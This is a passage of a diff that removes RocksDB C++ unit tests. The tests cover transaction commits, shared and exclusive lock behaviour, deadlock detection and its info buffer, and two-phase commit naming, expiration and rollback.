-TEST_P(TransactionTest, SuccessTest) {
-  ASSERT_OK(db->ResetStats());
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, Slice("foo"), Slice("bar"));
-  db->Put(write_options, Slice("foo2"), Slice("bar"));
-
-  Transaction* txn = db->BeginTransaction(write_options, TransactionOptions());
-  ASSERT_TRUE(txn);
-
-  ASSERT_EQ(0, txn->GetNumPuts());
-  ASSERT_LE(0, txn->GetID());
-
-  s = txn->GetForUpdate(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  s = txn->Put(Slice("foo"), Slice("bar2"));
-  ASSERT_OK(s);
-
-  ASSERT_EQ(1, txn->GetNumPuts());
-
-  s = txn->GetForUpdate(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, WaitingTxn) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  string value;
-  Status s;
-
-  txn_options.lock_timeout = 1;
-  s = db->Put(write_options, Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-
-  /* create second cf */
-  ColumnFamilyHandle* cfa;
-  ColumnFamilyOptions cf_options;
-  s = db->CreateColumnFamily(cf_options, "CFA", &cfa);
-  ASSERT_OK(s);
-  s = db->Put(write_options, cfa, Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  TransactionID id1 = txn1->GetID();
-  ASSERT_TRUE(txn1);
-  ASSERT_TRUE(txn2);
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", [&](void* arg) {
-        std::string key;
-        uint32_t cf_id;
-        std::vector<TransactionID> wait = txn2->GetWaitingTxns(&cf_id, &key);
-        ASSERT_EQ(key, "foo");
-        ASSERT_EQ(wait.size(), 1);
-        ASSERT_EQ(wait[0], id1);
-        ASSERT_EQ(cf_id, 0);
-      });
-
-  // lock key in default cf
-  s = txn1->GetForUpdate(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  // lock key in cfa
-  s = txn1->GetForUpdate(read_options, cfa, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  auto lock_data = db->GetLockStatusData();
-  // Locked keys exist in both column family.
-  ASSERT_EQ(lock_data.size(), 2);
-
-  auto cf_iterator = lock_data.begin();
-
-  // The iterator points to an unordered_multimap
-  // thus the test can not assume any particular order.
-
-  // Column family is 1 or 0 (cfa).
-  if (cf_iterator->first != 1 && cf_iterator->first != 0) {
-    FAIL();
-  }
-  // The locked key is "foo" and is locked by txn1
-  ASSERT_EQ(cf_iterator->second.key, "foo");
-  ASSERT_EQ(cf_iterator->second.ids.size(), 1);
-  ASSERT_EQ(cf_iterator->second.ids[0], txn1->GetID());
-
-  cf_iterator++;
-
-  // Column family is 0 (default) or 1.
-  if (cf_iterator->first != 1 && cf_iterator->first != 0) {
-    FAIL();
-  }
-  // The locked key is "foo" and is locked by txn1
-  ASSERT_EQ(cf_iterator->second.key, "foo");
-  ASSERT_EQ(cf_iterator->second.ids.size(), 1);
-  ASSERT_EQ(cf_iterator->second.ids[0], txn1->GetID());
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  s = txn2->GetForUpdate(read_options, "foo", &value);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  delete cfa;
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, SharedLocks) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  Status s;
-
-  txn_options.lock_timeout = 1;
-  s = db->Put(write_options, Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  Transaction* txn3 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-  ASSERT_TRUE(txn2);
-  ASSERT_TRUE(txn3);
-
-  // Test shared access between txns
-  s = txn1->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn3->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  auto lock_data = db->GetLockStatusData();
-  ASSERT_EQ(lock_data.size(), 1);
-
-  auto cf_iterator = lock_data.begin();
-  ASSERT_EQ(cf_iterator->second.key, "foo");
-
-  // We compare whether the set of txns locking this key is the same. To do
-  // this, we need to sort both vectors so that the comparison is done
-  // correctly.
-  std::vector<TransactionID> expected_txns = {txn1->GetID(), txn2->GetID(),
-                                              txn3->GetID()};
-  std::vector<TransactionID> lock_txns = cf_iterator->second.ids;
-  ASSERT_EQ(expected_txns, lock_txns);
-  ASSERT_FALSE(cf_iterator->second.exclusive);
-
-  txn1->Rollback();
-  txn2->Rollback();
-  txn3->Rollback();
-
-  // Test txn1 and txn2 sharing a lock and txn3 trying to obtain it.
-  s = txn1->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn3->GetForUpdate(read_options, "foo", nullptr);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  txn1->UndoGetForUpdate("foo");
-  s = txn3->GetForUpdate(read_options, "foo", nullptr);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  txn2->UndoGetForUpdate("foo");
-  s = txn3->GetForUpdate(read_options, "foo", nullptr);
-  ASSERT_OK(s);
-
-  txn1->Rollback();
-  txn2->Rollback();
-  txn3->Rollback();
-
-  // Test txn1 and txn2 sharing a lock and txn2 trying to upgrade lock.
-  s = txn1->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  txn1->UndoGetForUpdate("foo");
-  s = txn2->GetForUpdate(read_options, "foo", nullptr);
-  ASSERT_OK(s);
-
-  txn1->Rollback();
-  txn2->Rollback();
-
-  // Test txn1 trying to downgrade its lock.
-  s = txn1->GetForUpdate(read_options, "foo", nullptr, true /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  // Should still fail after "downgrading".
-  s = txn1->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  txn1->Rollback();
-  txn2->Rollback();
-
-  // Test txn1 holding an exclusive lock and txn2 trying to obtain shared
-  // access.
-  s = txn1->GetForUpdate(read_options, "foo", nullptr);
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_TRUE(s.IsTimedOut());
-  ASSERT_EQ(s.ToString(), "Operation timed out: Timeout waiting to lock key");
-
-  txn1->UndoGetForUpdate("foo");
-  s = txn2->GetForUpdate(read_options, "foo", nullptr, false /* exclusive */);
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-  delete txn3;
-}
-
-TEST_P(TransactionTest, DeadlockCycleShared) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-
-  txn_options.lock_timeout = 1000000;
-  txn_options.deadlock_detect = true;
-
-  // Set up a wait for chain like this:
-  //
-  // Tn -> T(n*2)
-  // Tn -> T(n*2 + 1)
-  //
-  // So we have:
-  // T1 -> T2 -> T4 ...
-  //    |     |> T5 ...
-  //    |> T3 -> T6 ...
-  //          |> T7 ...
-  // up to T31, then T[16 - 31] -> T1.
-  // Note that Tn holds lock on floor(n / 2).
-
-  std::vector<Transaction*> txns(31);
-
-  for (uint32_t i = 0; i < 31; i++) {
-    txns[i] = db->BeginTransaction(write_options, txn_options);
-    ASSERT_TRUE(txns[i]);
-    auto s = txns[i]->GetForUpdate(read_options, ToString((i + 1) / 2), nullptr,
-                                   false /* exclusive */);
-    ASSERT_OK(s);
-  }
-
-  std::atomic<uint32_t> checkpoints(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "TransactionLockMgr::AcquireWithTimeout:WaitingTxn",
-      [&](void* arg) { checkpoints.fetch_add(1); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // We want the leaf transactions to block and hold everyone back.
-  std::vector<port::Thread> threads;
-  for (uint32_t i = 0; i < 15; i++) {
-    std::function<void()> blocking_thread = [&, i] {
-      auto s = txns[i]->GetForUpdate(read_options, ToString(i + 1), nullptr,
-                                     true /* exclusive */);
-      ASSERT_OK(s);
-      txns[i]->Rollback();
-      delete txns[i];
-    };
-    threads.emplace_back(blocking_thread);
-  }
-
-  // Wait until all threads are waiting on each other.
-  while (checkpoints.load() != 15) {
-    /* sleep override */
-    std::this_thread::sleep_for(std::chrono::milliseconds(100));
-  }
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  // Complete the cycle T[16 - 31] -> T1
-  for (uint32_t i = 15; i < 31; i++) {
-    auto s =
-        txns[i]->GetForUpdate(read_options, "0", nullptr, true /* exclusive */);
-    ASSERT_TRUE(s.IsDeadlock());
-
-    // Calculate next buffer len, plateau at 5 when 5 records are inserted.
-    const uint32_t curr_dlock_buffer_len_ =
-        (i - 14 > kInitialMaxDeadlocks) ? kInitialMaxDeadlocks : (i - 14);
-
-    auto dlock_buffer = db->GetDeadlockInfoBuffer();
-    ASSERT_EQ(dlock_buffer.size(), curr_dlock_buffer_len_);
-    auto dlock_entry = dlock_buffer[0].path;
-    ASSERT_EQ(dlock_entry.size(), kInitialMaxDeadlocks);
-
-    int64_t curr_waiting_key = 0;
-
-    // Offset of each txn id from the root of the shared dlock tree's txn id.
-    int64_t offset_root = dlock_entry[0].m_txn_id - 1;
-    // Offset of the final entry in the dlock path from the root's txn id.
-    TransactionID leaf_id =
-        dlock_entry[dlock_entry.size() - 1].m_txn_id - offset_root;
-
-    for (auto it = dlock_entry.rbegin(); it != dlock_entry.rend(); it++) {
-      auto dl_node = *it;
-      ASSERT_EQ(dl_node.m_txn_id, offset_root + leaf_id);
-      ASSERT_EQ(dl_node.m_cf_id, 0);
-      ASSERT_EQ(dl_node.m_waiting_key, ToString(curr_waiting_key));
-      ASSERT_EQ(dl_node.m_exclusive, true);
-
-      if (curr_waiting_key == 0) {
-        curr_waiting_key = leaf_id;
-      }
-      curr_waiting_key /= 2;
-      leaf_id /= 2;
-    }
-  }
-
-  // Rollback the leaf transaction.
-  for (uint32_t i = 15; i < 31; i++) {
-    txns[i]->Rollback();
-    delete txns[i];
-  }
-
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  // Downsize the buffer and verify the 3 latest deadlocks are preserved.
-  auto dlock_buffer_before_resize = db->GetDeadlockInfoBuffer();
-  db->SetDeadlockInfoBufferSize(3);
-  auto dlock_buffer_after_resize = db->GetDeadlockInfoBuffer();
-  ASSERT_EQ(dlock_buffer_after_resize.size(), 3);
-
-  for (uint32_t i = 0; i < dlock_buffer_after_resize.size(); i++) {
-    for (uint32_t j = 0; j < dlock_buffer_after_resize[i].path.size(); j++) {
-      ASSERT_EQ(dlock_buffer_after_resize[i].path[j].m_txn_id,
-                dlock_buffer_before_resize[i].path[j].m_txn_id);
-    }
-  }
-
-  // Upsize the buffer and verify the 3 latest dealocks are preserved.
-  dlock_buffer_before_resize = db->GetDeadlockInfoBuffer();
-  db->SetDeadlockInfoBufferSize(5);
-  dlock_buffer_after_resize = db->GetDeadlockInfoBuffer();
-  ASSERT_EQ(dlock_buffer_after_resize.size(), 3);
-
-  for (uint32_t i = 0; i < dlock_buffer_before_resize.size(); i++) {
-    for (uint32_t j = 0; j < dlock_buffer_before_resize[i].path.size(); j++) {
-      ASSERT_EQ(dlock_buffer_after_resize[i].path[j].m_txn_id,
-                dlock_buffer_before_resize[i].path[j].m_txn_id);
-    }
-  }
-
-  // Downsize to 0 and verify the size is consistent.
-  dlock_buffer_before_resize = db->GetDeadlockInfoBuffer();
-  db->SetDeadlockInfoBufferSize(0);
-  dlock_buffer_after_resize = db->GetDeadlockInfoBuffer();
-  ASSERT_EQ(dlock_buffer_after_resize.size(), 0);
-
-  // Upsize from 0 to verify the size is persistent.
-  dlock_buffer_before_resize = db->GetDeadlockInfoBuffer();
-  db->SetDeadlockInfoBufferSize(3);
-  dlock_buffer_after_resize = db->GetDeadlockInfoBuffer();
-  ASSERT_EQ(dlock_buffer_after_resize.size(), 0);
-
-  // Contrived case of shared lock of cycle size 2 to verify that a shared
-  // lock causing a deadlock is correctly reported as "shared" in the buffer.
-  std::vector<Transaction*> txns_shared(2);
-
-  // Create a cycle of size 2.
-  for (uint32_t i = 0; i < 2; i++) {
-    txns_shared[i] = db->BeginTransaction(write_options, txn_options);
-    ASSERT_TRUE(txns_shared[i]);
-    auto s = txns_shared[i]->GetForUpdate(read_options, ToString(i), nullptr);
-    ASSERT_OK(s);
-  }
-
-  std::atomic<uint32_t> checkpoints_shared(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "TransactionLockMgr::AcquireWithTimeout:WaitingTxn",
-      [&](void* arg) { checkpoints_shared.fetch_add(1); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  std::vector<port::Thread> threads_shared;
-  for (uint32_t i = 0; i < 1; i++) {
-    std::function<void()> blocking_thread = [&, i] {
-      auto s =
-          txns_shared[i]->GetForUpdate(read_options, ToString(i + 1), nullptr);
-      ASSERT_OK(s);
-      txns_shared[i]->Rollback();
-      delete txns_shared[i];
-    };
-    threads_shared.emplace_back(blocking_thread);
-  }
-
-  // Wait until all threads are waiting on each other.
-  while (checkpoints_shared.load() != 1) {
-    /* sleep override */
-    std::this_thread::sleep_for(std::chrono::milliseconds(100));
-  }
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  // Complete the cycle T2 -> T1 with a shared lock.
-  auto s = txns_shared[1]->GetForUpdate(read_options, "0", nullptr, false);
-  ASSERT_TRUE(s.IsDeadlock());
-
-  auto dlock_buffer = db->GetDeadlockInfoBuffer();
-
-  // Verify the size of the buffer and the single path.
-  ASSERT_EQ(dlock_buffer.size(), 1);
-  ASSERT_EQ(dlock_buffer[0].path.size(), 2);
-
-  // Verify the exclusivity field of the transactions in the deadlock path.
-  ASSERT_TRUE(dlock_buffer[0].path[0].m_exclusive);
-  ASSERT_FALSE(dlock_buffer[0].path[1].m_exclusive);
-  txns_shared[1]->Rollback();
-  delete txns_shared[1];
-
-  for (auto& t : threads_shared) {
-    t.join();
-  }
-}
-
-TEST_P(TransactionTest, DeadlockCycle) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-
-  // offset by 2 from the max depth to test edge case
-  const uint32_t kMaxCycleLength = 52;
-
-  txn_options.lock_timeout = 1000000;
-  txn_options.deadlock_detect = true;
-
-  for (uint32_t len = 2; len < kMaxCycleLength; len++) {
-    // Set up a long wait for chain like this:
-    //
-    // T1 -> T2 -> T3 -> ... -> Tlen
-
-    std::vector<Transaction*> txns(len);
-
-    for (uint32_t i = 0; i < len; i++) {
-      txns[i] = db->BeginTransaction(write_options, txn_options);
-      ASSERT_TRUE(txns[i]);
-      auto s = txns[i]->GetForUpdate(read_options, ToString(i), nullptr);
-      ASSERT_OK(s);
-    }
-
-    std::atomic<uint32_t> checkpoints(0);
-    rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "TransactionLockMgr::AcquireWithTimeout:WaitingTxn",
-        [&](void* arg) { checkpoints.fetch_add(1); });
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    // We want the last transaction in the chain to block and hold everyone
-    // back.
-    std::vector<port::Thread> threads;
-    for (uint32_t i = 0; i < len - 1; i++) {
-      std::function<void()> blocking_thread = [&, i] {
-        auto s = txns[i]->GetForUpdate(read_options, ToString(i + 1), nullptr);
-        ASSERT_OK(s);
-        txns[i]->Rollback();
-        delete txns[i];
-      };
-      threads.emplace_back(blocking_thread);
-    }
-
-    // Wait until all threads are waiting on each other.
-    while (checkpoints.load() != len - 1) {
-      /* sleep override */
-      std::this_thread::sleep_for(std::chrono::milliseconds(100));
-    }
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-    rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-    // Complete the cycle Tlen -> T1
-    auto s = txns[len - 1]->GetForUpdate(read_options, "0", nullptr);
-    ASSERT_TRUE(s.IsDeadlock());
-
-    const uint32_t dlock_buffer_size_ = (len - 1 > 5) ? 5 : (len - 1);
-    uint32_t curr_waiting_key = 0;
-    TransactionID curr_txn_id = txns[0]->GetID();
-
-    auto dlock_buffer = db->GetDeadlockInfoBuffer();
-    ASSERT_EQ(dlock_buffer.size(), dlock_buffer_size_);
-    uint32_t check_len = len;
-    bool check_limit_flag = false;
-
-    // Special case for a deadlock path that exceeds the maximum depth.
-    if (len > 50) {
-      check_len = 0;
-      check_limit_flag = true;
-    }
-    auto dlock_entry = dlock_buffer[0].path;
-    ASSERT_EQ(dlock_entry.size(), check_len);
-    ASSERT_EQ(dlock_buffer[0].limit_exceeded, check_limit_flag);
-
-    // Iterates backwards over path verifying decreasing txn_ids.
-    for (auto it = dlock_entry.rbegin(); it != dlock_entry.rend(); it++) {
-      auto dl_node = *it;
-      ASSERT_EQ(dl_node.m_txn_id, len + curr_txn_id - 1);
-      ASSERT_EQ(dl_node.m_cf_id, 0);
-      ASSERT_EQ(dl_node.m_waiting_key, ToString(curr_waiting_key));
-      ASSERT_EQ(dl_node.m_exclusive, true);
-
-      curr_txn_id--;
-      if (curr_waiting_key == 0) {
-        curr_waiting_key = len;
-      }
-      curr_waiting_key--;
-    }
-
-    // Rollback the last transaction.
-    txns[len - 1]->Rollback();
-    delete txns[len - 1];
-
-    for (auto& t : threads) {
-      t.join();
-    }
-  }
-}
-
-TEST_P(TransactionTest, DeadlockStress) {
-  const uint32_t NUM_TXN_THREADS = 10;
-  const uint32_t NUM_KEYS = 100;
-  const uint32_t NUM_ITERS = 10000;
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-
-  txn_options.lock_timeout = 1000000;
-  txn_options.deadlock_detect = true;
-  std::vector<std::string> keys;
-
-  for (uint32_t i = 0; i < NUM_KEYS; i++) {
-    db->Put(write_options, Slice(ToString(i)), Slice(""));
-    keys.push_back(ToString(i));
-  }
-
-  size_t tid = std::hash<std::thread::id>()(std::this_thread::get_id());
-  Random rnd(static_cast<uint32_t>(tid));
-  std::function<void(uint32_t)> stress_thread = [&](uint32_t seed) {
-    std::default_random_engine g(seed);
-
-    Transaction* txn;
-    for (uint32_t i = 0; i < NUM_ITERS; i++) {
-      txn = db->BeginTransaction(write_options, txn_options);
-      auto random_keys = keys;
-      std::shuffle(random_keys.begin(), random_keys.end(), g);
-
-      // Lock keys in random order.
-      for (const auto& k : random_keys) {
-        // Lock mostly for shared access, but exclusive 1/4 of the time.
-        auto s =
-            txn->GetForUpdate(read_options, k, nullptr, txn->GetID() % 4 == 0);
-        if (!s.ok()) {
-          ASSERT_TRUE(s.IsDeadlock());
-          txn->Rollback();
-          break;
-        }
-      }
-
-      delete txn;
-    }
-  };
-
-  std::vector<port::Thread> threads;
-  for (uint32_t i = 0; i < NUM_TXN_THREADS; i++) {
-    threads.emplace_back(stress_thread, rnd.Next());
-  }
-
-  for (auto& t : threads) {
-    t.join();
-  }
-}
-
-TEST_P(TransactionTest, CommitTimeBatchFailTest) {
-  WriteOptions write_options;
-  TransactionOptions txn_options;
-
-  string value;
-  Status s;
-
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-
-  txn1->GetCommitTimeWriteBatch()->Put("cat", "dog");
-
-  s = txn1->Put("foo", "bar");
-  ASSERT_OK(s);
-
-  // fails due to non-empty commit-time batch
-  s = txn1->Commit();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  delete txn1;
-}
-
-TEST_P(TransactionTest, SimpleTwoPhaseTransactionTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-
-  TransactionOptions txn_options;
-
-  string value;
-  Status s;
-
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("xid");
-  ASSERT_OK(s);
-
-  ASSERT_EQ(db->GetTransactionByName("xid"), txn);
-
-  // transaction put
-  s = txn->Put(Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-  ASSERT_EQ(1, txn->GetNumPuts());
-
-  // regular db put
-  s = db->Put(write_options, Slice("foo2"), Slice("bar2"));
-  ASSERT_OK(s);
-  ASSERT_EQ(1, txn->GetNumPuts());
-
-  // regular db read
-  db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(value, "bar2");
-
-  // commit time put
-  txn->GetCommitTimeWriteBatch()->Put(Slice("gtid"), Slice("dogs"));
-  txn->GetCommitTimeWriteBatch()->Put(Slice("gtid2"), Slice("cats"));
-
-  // nothing has been prepped yet
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(), 0);
-
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  // data not im mem yet
-  s = db->Get(read_options, Slice("foo"), &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = db->Get(read_options, Slice("gtid"), &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // find trans in list of prepared transactions
-  std::vector<Transaction*> prepared_trans;
-  db->GetAllPreparedTransactions(&prepared_trans);
-  ASSERT_EQ(prepared_trans.size(), 1);
-  ASSERT_EQ(prepared_trans.front()->GetName(), "xid");
-
-  auto log_containing_prep =
-      db_impl->TEST_FindMinLogContainingOutstandingPrep();
-  ASSERT_GT(log_containing_prep, 0);
-
-  // make commit
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  // value is now available
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  s = db->Get(read_options, "gtid", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "dogs");
-
-  s = db->Get(read_options, "gtid2", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "cats");
-
-  // we already committed
-  s = txn->Commit();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // no longer is prpared results
-  db->GetAllPreparedTransactions(&prepared_trans);
-  ASSERT_EQ(prepared_trans.size(), 0);
-  ASSERT_EQ(db->GetTransactionByName("xid"), nullptr);
-
-  // heap should not care about prepared section anymore
-  ASSERT_EQ(db_impl->TEST_FindMinLogContainingOutstandingPrep(), 0);
-
-  // but now our memtable should be referencing the prep section
-  ASSERT_EQ(log_containing_prep,
-            db_impl->TEST_FindMinPrepLogReferencedByMemTable());
-
-  db_impl->TEST_FlushMemTable(true);
-
-  // after memtable flush we can now relese the log
-  ASSERT_EQ(0, db_impl->TEST_FindMinPrepLogReferencedByMemTable());
-
-  delete txn;
-}
-
-TEST_P(TransactionTest, TwoPhaseNameTest) {
-  Status s;
-
-  WriteOptions write_options;
-  TransactionOptions txn_options;
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  Transaction* txn3 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn3);
-  delete txn3;
-
-  // cant prepare txn without name
-  s = txn1->Prepare();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // name too short
-  s = txn1->SetName("");
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // name too long
-  s = txn1->SetName(std::string(513, 'x'));
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // valid set name
-  s = txn1->SetName("name1");
-  ASSERT_OK(s);
-
-  // cant have duplicate name
-  s = txn2->SetName("name1");
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // shouldn't be able to prepare
-  s = txn2->Prepare();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // valid name set
-  s = txn2->SetName("name2");
-  ASSERT_OK(s);
-
-  // cant reset name
-  s = txn2->SetName("name3");
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  ASSERT_EQ(txn1->GetName(), "name1");
-  ASSERT_EQ(txn2->GetName(), "name2");
-
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-
-  // can't rename after prepare
-  s = txn1->SetName("name4");
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, TwoPhaseEmptyWriteTest) {
-  Status s;
-  std::string value;
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn2);
-
-  s = txn1->SetName("joe");
-  ASSERT_OK(s);
-
-  s = txn2->SetName("bob");
-  ASSERT_OK(s);
-
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-
-  txn2->GetCommitTimeWriteBatch()->Put(Slice("foo"), Slice("bar"));
-
-  s = txn2->Prepare();
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar");
-
-  delete txn2;
-}
-
-TEST_P(TransactionTest, TwoPhaseExpirationTest) {
-  Status s;
-
-  WriteOptions write_options;
-  TransactionOptions txn_options;
-  txn_options.expiration = 500;  // 500ms
-  Transaction* txn1 = db->BeginTransaction(write_options, txn_options);
-  Transaction* txn2 = db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn1);
-  ASSERT_TRUE(txn1);
-
-  s = txn1->SetName("joe");
-  ASSERT_OK(s);
-  s = txn2->SetName("bob");
-  ASSERT_OK(s);
-
-  s = txn1->Prepare();
-  ASSERT_OK(s);
-
-  /* sleep override */
-  std::this_thread::sleep_for(std::chrono::milliseconds(1000));
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Prepare();
-  ASSERT_EQ(s, Status::Expired());
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_P(TransactionTest, TwoPhaseRollbackTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-
-  TransactionOptions txn_options;
-
-  string value;
-  Status s;
-
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db->GetRootDB());
-  Transaction* txn = db->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("xid");
-  ASSERT_OK(s);
-
-  // transaction put
-  s = txn->Put(Slice("tfoo"), Slice("tbar"));
-  ASSERT_OK(s);
-
-  // value is readable form txn
-  s = txn->Get(read_options, Slice("tfoo"), &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "tbar");
-
-  // issue rollback
-  s = txn->Rollback();
-  ASSERT_OK(s);
-
-  // value is nolonger readable
-  s = txn->Get(read_options, Slice("tfoo"), &value);
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ(txn->GetNumPuts(), 0);
-
-  // put new txn values
-  s = txn->Put(Slice("tfoo2"), Slice("tbar2"));
-  ASSERT_OK(s);
-
-  // new value is readable from txn
-  s = txn->Get(read_options, Slice("tfoo2"), &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "tbar2");
-
-  s = txn->Prepare();
-  ASSERT_OK(s);
-
-  // flush to next wal
-  s = db->Put(write_options, Slice("foo"), Slice("bar"));
-  ASSERT_OK(s);
-  db_impl->TEST_FlushMemTable(true);
-
-  // issue rollback (marker written to WAL)
-  s = txn->Rollback();
-  ASSERT_OK(s);
-
-  // value is nolonger readable
-  s = txn->Get(read_options, Slice("tfoo2"), &value);
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ(txn->GetNumPuts(), 0);
-
-  // make commit
-  s = txn->Commit();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
-  // try rollback again
-  s = txn->Rollback();
-  ASSERT_EQ(s, Status::InvalidArgument());
-
